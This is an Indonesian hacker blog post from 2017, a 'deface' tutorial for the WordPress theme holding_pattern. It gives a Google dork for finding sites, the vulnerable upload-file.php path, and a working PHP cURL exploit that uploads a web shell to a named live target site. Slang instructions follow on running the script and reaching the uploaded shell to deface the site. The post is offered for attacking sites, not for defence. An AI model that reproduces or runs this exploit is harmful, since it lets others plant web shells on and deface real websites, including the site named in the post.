Jumat, 27 Januari 2017

Tutorial deface Wordpress Themes holding_pattern

- Exploit Title: Wordpress Themes Holding Pattern
- Google Dork 1 : inurl:/wp-content/themes/holding_pattern/
-Exploit : /wp-content/themes/holding_pattern/admin/upload-file.php

<?php
$uploadfile="chaYankVica.php";
$target = "http://www.shani-indira.org/wp-content/themes/holding_pattern/admin/upload-file.php";
$domain = explode("/", $target);
$server_addr = gethostbyname($domain[2]);
$ch = curl_init($target."/wp-content/themes/holding_pattern/admin/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_VERBOSE, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
====================================================================================================
dorking ae kek biasa
kali ini gua udah ada live target
masukin exploit, vuln = blank
jan lupa exploiter ama shell simpen satu directory
xampp/php/
kalo ada bacaan succes berarti shell berhasil ke upload
akses nya ?
/wp-content/themes/holding_pattern/uploads/shell.php
webnya asu :'v
dah gitu aja yaa tq
-BERDENDANGC0DE

./Mr.greetz69

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.

0 komentar:

Posting Komentar

 

Copyright @ 2013 BerdendangC0de.

Designed by Templateiy & CollegeTalks